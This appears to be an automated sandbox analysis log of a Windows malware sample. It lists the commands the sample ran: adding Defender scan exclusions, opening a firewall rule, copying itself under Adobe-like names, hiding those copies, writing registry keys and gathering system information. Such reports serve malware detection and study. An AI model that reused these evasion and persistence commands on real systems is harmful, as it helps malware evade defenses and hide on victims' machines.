Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exeJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoamiJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoamiJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /fJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C verJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yesJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig //flushdnsJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get nameJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
